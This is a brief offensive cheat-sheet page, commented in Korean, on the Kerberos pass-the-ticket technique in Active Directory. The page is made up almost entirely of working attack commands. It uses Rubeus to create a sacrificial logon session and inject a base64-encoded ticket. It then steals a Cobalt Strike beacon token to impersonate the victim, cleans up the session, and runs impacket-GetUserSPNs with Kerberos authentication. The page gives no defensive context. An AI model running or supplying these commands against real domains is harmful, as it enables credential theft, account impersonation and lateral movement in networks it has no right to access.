Pass the Ticket
Abuse
# 익명 로그인 세션 생성
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DC01 /username:Mick3y /password:FakePass
# 익명 로그인 세션에 Base64 Encoded Ticket 삽입
.\Rubeus.exe ptt /luid:0x19e0c /ticket:'<base64-encoded-ticket>'
# 삽입한 티켓이 있는 로그인 세션의 토큰을 사용함에 따라 클라이언트 가장
beacon> token-store steal '<pid>'
# 세션 정리
rev2self
kill 1590# impacket 프로젝트는 -k -no-pass 사용
impacket-GetUserSPNs contoso.com/Mick3y -k -no-passLast updated